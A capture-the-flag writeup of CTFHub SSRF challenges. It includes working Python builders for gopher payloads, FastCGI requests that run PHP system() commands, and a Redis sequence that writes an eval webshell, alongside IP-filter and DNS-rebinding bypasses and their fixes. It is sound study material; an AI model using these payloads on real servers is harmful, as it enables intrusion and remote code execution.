CTFHUB SSRF
2022-06-25 04:55:00 【Cn Sirius】
Bypass by protocol
POST
Open index.php and look at the source code with F12:
<?php
error_reporting(0);
// Without a url parameter the page redirects to itself with ?url=_ ;
// $_REQUEST means the value may come from the query string, a POST body or a cookie.
if (!isset($_REQUEST['url'])){
header("Location: /?url=_");
exit;
}
$ch = curl_init();
// The user-supplied value goes straight into curl: any scheme curl supports
// (http, file, gopher, dict, ...) and any host, including 127.0.0.1, can be requested.
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // redirects are followed as well
curl_exec($ch);
curl_close($ch);
?>
Note header("Location: /?url=_"): the page redirects to itself and takes the target from the url GET parameter. The challenge prompt says flag.php must be reached with a POST request, which an http:// URL handed to curl cannot produce (curl issues a GET), so the POST request is built by hand and delivered through the gopher:// scheme.
Request ?url=127.0.0.1/flag.php and look at the page source with F12; it contains a key:
key=92635644157d7ddc6cf24da0e781978e
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=92635644157d7ddc6cf24da0e781978e
This is the raw request to deliver.
The request is then URL-encoded three times.
After the first round of encoding, manually put %0D in front of every %0A so that each line ends in CRLF (%0D%0A) as HTTP requires; the later rounds then re-encode the % signs.
Content-Length is the byte length of the POST body, i.e. of key=<value>: 4 bytes for key= plus the 32-character key gives 36.
127.0.0.1/index.php/?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D92635644157d7ddc6cf24da0e781978e
This is the value passed as the url parameter.
The coloured part is the personal key; replace it with your own and send the request.
When I got the parameters wrong in this challenge, a passage like this appeared:
ctfhub{b644d27a30b450b2f170c4f19ef1dd85fb1efc5d} This is an Easter-egg flag and has nothing to do with the problem.
There are several more Easter eggs, though.
So many Easter eggs; where do you submit them?
Upload files
This time a file has to be uploaded, but the web page has no submit button, so modify the page source and add one:
<input type="submit" name="submit">
Submit a file and capture the request with a proxy.
URL-encode this multipart request the same way as before and assemble it into a new gopher payload.
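The two gopher payloads above (the hand-written POST of the key and the captured multipart upload) are both built the same way: write the raw HTTP request with CRLF line endings and a correct Content-Length, then percent-encode it once per decoder that sits between the browser and the target socket. The following is an added example written for this page, not the author's script or a CTFHub tool; it reproduces the writeup's triple-encoded POST payload byte for byte and also builds the multipart request for the upload challenge. The boundary string and the file field name are assumptions; the challenge's real form may use a different field name.

```python
import re
from urllib.parse import quote

CRLF = "\r\n"


def build_post_request(host: str, path: str, body: bytes,
                       content_type: str = "application/x-www-form-urlencoded") -> bytes:
    """Raw HTTP/1.1 POST with Content-Length computed from the body.

    Every line ends in CRLF; this is the "%0D before every %0A" step the
    writeup performs by hand after the first round of URL-encoding.
    """
    head = CRLF.join([
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"Content-Type: {content_type}",
        f"Content-Length: {len(body)}",
    ])
    return head.encode() + CRLF.encode() * 2 + body


def build_multipart_upload(host: str, path: str, field: str, filename: str,
                           file_bytes: bytes, boundary: str = "----ctfhubboundary") -> bytes:
    """Multipart/form-data POST carrying one file plus the submit field added to the form.

    Field name and boundary are assumptions for this example, not taken from the challenge.
    """
    file_part = (
        f"--{boundary}{CRLF}"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"{CRLF}'
        f"Content-Type: text/plain{CRLF}{CRLF}"
    ).encode() + file_bytes + CRLF.encode()
    submit_part = (
        f"--{boundary}{CRLF}"
        f'Content-Disposition: form-data; name="submit"{CRLF}{CRLF}submit{CRLF}'
    ).encode()
    closing = f"--{boundary}--{CRLF}".encode()
    body = file_part + submit_part + closing
    return build_post_request(host, path, body, f"multipart/form-data; boundary={boundary}")


def to_gopher_url(host: str, port: int, raw_request: bytes, encodings: int = 3) -> str:
    """Wrap a raw TCP payload in a gopher:// URL for curl.

    Round one encodes every byte (safe="" also turns '/' into %2F, as in the
    writeup's payload); every further round re-encodes the '%' signs. PHP's
    query-string parsing strips one round and curl's gopher handler strips
    another; the writeup encodes three times, which is the default here.
    One round too many means the target sees literal %XX text, so count the
    decoders in front of the socket before sending.
    """
    payload = quote(raw_request, safe="")
    for _ in range(encodings - 1):
        payload = quote(payload, safe="")
    return f"gopher://{host}:{port}/_{payload}"


def declared_content_length(raw_request: bytes) -> int:
    """Cross-check: returns the Content-Length header only if it matches the real body size, else -1."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    match = re.search(rb"Content-Length: (\d+)", head)
    if match and int(match.group(1)) == len(body):
        return len(body)
    return -1


if __name__ == "__main__":
    # Key value taken from the writeup; replace with your own.
    req = build_post_request("127.0.0.1:80", "/flag.php", b"key=92635644157d7ddc6cf24da0e781978e")
    print(to_gopher_url("127.0.0.1", 80, req))
```

The printed URL is what goes after ?url= on index.php. For the upload challenge, pass the output of build_multipart_upload to to_gopher_url instead; declared_content_length is the check to run on a request captured with Burp after editing it, since a stale Content-Length makes the backend wait for bytes that never arrive.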
FastCGI
Generate the payload with Gopherus:
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH70%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00F%04%00%3C%3Fphp%20system%28%27find%20/%20-name%20flag%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
Then take everything after /_ (from %01 onwards), encode it as before, prepend gopher://127.0.0.1:9000/_ again, and the result is the payload.
This reveals the location of the flag.
Then regenerate the payload with Gopherus, replacing the command with a cat of the flag file in that directory.
Note: two files with flag in the name show up; the one to cat is the one whose name is followed by a string of digits.
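What Gopherus packs after gopher://127.0.0.1:9000/_ is a FastCGI request: a BEGIN_REQUEST record, a PARAMS record carrying the CGI environment (including the PHP_VALUE ini override that turns the request body into PHP code via auto_prepend_file = php://input), and a STDIN record with the body. The following is an added example for this page, not Gopherus's own code, showing how those records are framed so a captured payload like the one above can be read or rebuilt with a different command. It assumes php-fpm listens on 9000 and that SCRIPT_FILENAME points at a .php file that exists on the target (the writeup uses /var/www/html/index.php).

```python
import struct
from urllib.parse import quote

FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1
HEADER = ">BBHHBx"  # version, type, requestId, contentLength, paddingLength, reserved

# The ini overrides Gopherus sends in PHP_VALUE: php-fpm applies them per request,
# and auto_prepend_file = php://input makes the FastCGI stdin body execute as PHP.
PHP_VALUE = "allow_url_include = On\ndisable_functions = \nauto_prepend_file = php://input"


def fcgi_record(rec_type: int, content: bytes, request_id: int = 1) -> bytes:
    """One FastCGI record: 8-byte header, content, zero padding to an 8-byte boundary."""
    if len(content) > 0xFFFF:
        raise ValueError("content must be split across records (16-bit length field)")
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(HEADER, 1, rec_type, request_id, len(content), padding)
    return header + content + b"\x00" * padding


def fcgi_name_value(name: str, value: str) -> bytes:
    """FCGI_PARAMS pair: each length is one byte below 128, else four bytes with the top bit set."""
    n, v = name.encode(), value.encode()
    out = b""
    for length in (len(n), len(v)):
        out += bytes([length]) if length < 128 else struct.pack(">I", length | 0x80000000)
    return out + n + v


def fastcgi_php_payload(script_filename: str, php_code: str, request_id: int = 1) -> bytes:
    """BEGIN_REQUEST, PARAMS, empty PARAMS, STDIN, empty STDIN: the byte stream sent to php-fpm."""
    body = php_code.encode()
    params = {
        "REQUEST_METHOD": "POST",
        "SCRIPT_FILENAME": script_filename,  # must be an existing .php file php-fpm will serve
        "SERVER_PROTOCOL": "HTTP/1.1",
        "REMOTE_ADDR": "127.0.0.1",
        "CONTENT_LENGTH": str(len(body)),
        "DOCUMENT_ROOT": "/",
        "PHP_VALUE": PHP_VALUE,
    }
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)  # role, flags (no keep-alive), reserved
    out = fcgi_record(FCGI_BEGIN_REQUEST, begin, request_id)
    out += fcgi_record(FCGI_PARAMS, b"".join(fcgi_name_value(k, v) for k, v in params.items()), request_id)
    out += fcgi_record(FCGI_PARAMS, b"", request_id)  # empty record terminates the params stream
    out += fcgi_record(FCGI_STDIN, body, request_id)
    out += fcgi_record(FCGI_STDIN, b"", request_id)   # empty record terminates stdin
    return out


def parse_records(data: bytes) -> list:
    """Decode a record stream back into (type, content) pairs, e.g. to inspect a Gopherus payload."""
    records, pos = [], 0
    while pos + 8 <= len(data):
        _version, rec_type, _rid, length, padding = struct.unpack(HEADER, data[pos:pos + 8])
        pos += 8
        records.append((rec_type, data[pos:pos + length]))
        pos += length + padding
    return records


def fastcgi_gopher_url(host: str, port: int, payload: bytes) -> str:
    """Percent-encode once for curl's gopher handler; encode again for each decoder in front of it."""
    return f"gopher://{host}:{port}/_" + quote(payload, safe="")


if __name__ == "__main__":
    code = "<?php system('find / -name flag*'); ?>"
    print(fastcgi_gopher_url("127.0.0.1", 9000, fastcgi_php_payload("/var/www/html/index.php", code)))
```

Running parse_records over the percent-decoded Gopherus payload shows the same five records; the PARAMS content there is 260 bytes with 4 bytes of padding, which is why the header reads %01%04%00%01%01%04%04%00.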
Redis protocol
Gopherus is used again.
Encode the gopher payload the same way as before.
Then connect to the written shell with AntSword.
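The Redis payload Gopherus produces is plain RESP (the redis-cli wire format) smuggled over gopher: CONFIG SET dir / dbfilename point the RDB dump at the web root, SET stores the PHP shell as a value, and SAVE writes the file that AntSword then connects to. The following is an added example for this page, not Gopherus's code; it encodes and decodes that command sequence so a payload can be verified before it is sent. The web root, file name and shell contents are assumptions for the example.

```python
from urllib.parse import quote


def resp_command(*args: str) -> bytes:
    """Encode one command as a RESP array of bulk strings, the format redis-cli puts on the wire."""
    out = f"*{len(args)}\r\n".encode()
    for arg in args:
        data = arg.encode()
        out += f"${len(data)}\r\n".encode() + data + b"\r\n"
    return out


def redis_webshell_commands(web_root: str, filename: str, shell: str) -> list:
    """CONFIG SET / SET / SAVE: make redis write its RDB dump, containing the shell, into the web root.

    The RDB file has a binary header and trailer around the value; PHP ignores bytes
    outside <?php ... ?>, and the surrounding newlines keep the tag on its own line.
    """
    return [
        ("CONFIG", "SET", "dir", web_root),
        ("CONFIG", "SET", "dbfilename", filename),
        ("SET", "x", f"\n\n{shell}\n\n"),
        ("SAVE",),
    ]


def redis_gopher_url(host: str, port: int, commands: list) -> str:
    """Concatenate the RESP frames and percent-encode them once for curl's gopher handler."""
    raw = b"".join(resp_command(*cmd) for cmd in commands)
    return f"gopher://{host}:{port}/_" + quote(raw, safe="")


def parse_resp_commands(data: bytes) -> list:
    """Decode a stream of RESP arrays back into argument lists (to check a payload before sending)."""
    commands, pos = [], 0
    while pos < len(data):
        if data[pos:pos + 1] != b"*":
            raise ValueError(f"expected array at offset {pos}")
        end = data.index(b"\r\n", pos)
        count, pos = int(data[pos + 1:end]), end + 2
        args = []
        for _ in range(count):
            if data[pos:pos + 1] != b"$":
                raise ValueError(f"expected bulk string at offset {pos}")
            end = data.index(b"\r\n", pos)
            length, pos = int(data[pos + 1:end]), end + 2
            args.append(data[pos:pos + length].decode())
            pos += length + 2
        commands.append(args)
    return commands


if __name__ == "__main__":
    # Hypothetical web root, file name and shell for the example.
    cmds = redis_webshell_commands("/var/www/html", "shell.php", "<?php eval($_POST['cmd']); ?>")
    print(redis_gopher_url("127.0.0.1", 6379, cmds))
```

The bulk-string lengths are what make this robust: because each argument is length-prefixed, the shell may contain spaces, quotes and newlines without any escaping. A target redis that has requirepass set, or that runs as a user without write access to the web root, fails at the first CONFIG SET or at SAVE, so read the response if the SSRF returns it.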

Numeric IP bypass
127.0.0.1 can also be written as:
Hexadecimal: 0x7F000001
Decimal: 2130706433
Both forms can be verified with ping.
Then splice the alternative form into the url parameter like this:
302 redirect bypass
View the index.php source with F12 (fetched through file:///):
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
header("Location: /?url=_");
exit;
}
$url = $_REQUEST['url'];
// Blocklist: a plain substring match on the raw url string for the digit
// sequences 127, 172, 10 and 192. Nothing is resolved or normalised.
if (preg_match("/127|172|10|192/", $url)) {
exit("hacker! Ban Intranet IP");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
// Redirects are followed, and the redirect target is never checked against the filter.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>
Only those digit sequences are filtered, so localhost passes straight through, and the hexadecimal form from the previous challenge still works as well. The route the title refers to, a 302 from an external page to the intranet address, also works because CURLOPT_FOLLOWLOCATION is enabled and only the initial url is checked.
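The numeric-IP and 302 challenges share one lesson: a filter that looks at the string the user typed says nothing about the address curl will connect to. The following is an added example for this page (not the challenge's or the author's code). It reproduces the regex from the index.php above, generates the alternative spellings of 127.0.0.1 that libc/curl accept under the classic inet_aton rules (decimal, hex, octal and the short 127.1 form), shows that the regex misses them, and then does what the filter should have done: normalise to a dotted quad first and test that. The normaliser follows the BSD inet_aton rules; individual clients differ on some edge forms, which is an assumption to check against the real resolver in use.

```python
import ipaddress
import re

# The blocklist from the challenge's index.php: a substring match on the raw url string.
INTRANET_FILTER = re.compile(r"127|172|10|192")


def filter_blocks(url: str) -> bool:
    """True if the challenge's preg_match would reject this value."""
    return INTRANET_FILTER.search(url) is not None


def _parse_part(part: str) -> int:
    """inet_aton rules: 0x.. is hex, a leading 0 is octal, otherwise decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def inet_aton_like(text: str) -> str:
    """Normalise an IPv4 literal in any classic inet_aton form to dotted-quad.

    'a', 'a.b', 'a.b.c' and 'a.b.c.d' are all accepted; the last part fills the
    remaining bytes, which is why 127.1 means 127.0.0.1. Raises ValueError on
    anything that is not an IPv4 literal (e.g. 'localhost').
    """
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(text)
    values = [_parse_part(p) for p in parts]
    *head, last = values
    width = 4 - len(head)
    if any(not 0 <= v <= 255 for v in head) or not 0 <= last < 256 ** width:
        raise ValueError(text)
    n = 0
    for v in head:
        n = (n << 8) | v
    n = (n << (8 * width)) | last
    return str(ipaddress.IPv4Address(n))


def loopback_spellings(dotted: str = "127.0.0.1") -> dict:
    """Alternative spellings of one address that resolve identically."""
    n = int(ipaddress.IPv4Address(dotted))
    return {
        "decimal": str(n),
        "hex": f"0x{n:08X}",
        "octal": f"0{n:o}",
        "short": f"{n >> 24}.{n & 0xFFFFFF}",
    }


def is_loopback_after_normalising(host: str) -> bool:
    """What the filter should have done: normalise first, then test the address, not the string."""
    try:
        return ipaddress.ip_address(inet_aton_like(host)).is_loopback
    except ValueError:
        return host.lower() == "localhost"


if __name__ == "__main__":
    for form, spelling in loopback_spellings().items():
        print(f"{form:8} {spelling:14} blocked={filter_blocks(spelling)} "
              f"normalised={inet_aton_like(spelling)}")
```

The decimal, hex and octal spellings all pass the regex and all normalise to 127.0.0.1; only the short form 127.1 trips it, because the digits 127 survive. A real defence resolves the host name, normalises the result and checks the address against the loopback and RFC 1918 ranges, and repeats that check on every redirect hop.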
DNS rebinding bypass
The challenge page itself explains the technique after it opens.
Use DNS rebinding: bind the domain to two records, a public address and the intranet one, so the check sees one answer and curl gets the other.
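The bypass works because the filter and the fetch resolve the name separately: the blocklist check gets the public address, and a moment later curl asks again and gets 127.0.0.1. The following is an added example for this page (not the challenge's or the author's code) with a constructed resolver that alternates its answers, the way a rebinding domain with a zero TTL does; it shows the check-then-fetch pattern being beaten and the fix, resolving once and connecting to the pinned address. The host name rebind.example and the public address 1.1.1.1 are stand-ins chosen for the example.

```python
import ipaddress
from itertools import cycle


class RebindingResolver:
    """Stand-in for a DNS rebinding service (constructed for this example): returns the
    configured answers in turn, as a domain with two A records and a 0-second TTL would."""

    def __init__(self, answers):
        self._answers = cycle(answers)
        self.lookups = 0

    def resolve(self, hostname: str) -> str:
        self.lookups += 1
        return next(self._answers)


def is_internal(ip: str) -> bool:
    """Loopback, RFC 1918 and link-local addresses are off limits for an outbound fetch."""
    addr = ipaddress.ip_address(ip)
    return addr.is_loopback or addr.is_private or addr.is_link_local


def fetch_check_then_resolve_again(hostname: str, resolver) -> str:
    """The vulnerable pattern: validate the name, then hand the name to the HTTP client,
    which resolves it a second time and gets the other answer."""
    if is_internal(resolver.resolve(hostname)):
        return "blocked"
    return f"connected to {resolver.resolve(hostname)}"


def fetch_pinned(hostname: str, resolver) -> str:
    """The fix: resolve once, validate that address, and connect to it (the Host header
    still carries the original name). Every redirect hop must repeat the whole check."""
    ip = resolver.resolve(hostname)
    if is_internal(ip):
        return "blocked"
    return f"connected to {ip}"


if __name__ == "__main__":
    attacker_dns = RebindingResolver(["1.1.1.1", "127.0.0.1"])
    print(fetch_check_then_resolve_again("rebind.example", attacker_dns))
    attacker_dns = RebindingResolver(["1.1.1.1", "127.0.0.1"])
    print(fetch_pinned("rebind.example", attacker_dns))
```

With curl this pinning is what CURLOPT_RESOLVE (the --resolve option) is for: the validated address is handed to curl explicitly so that no second lookup happens.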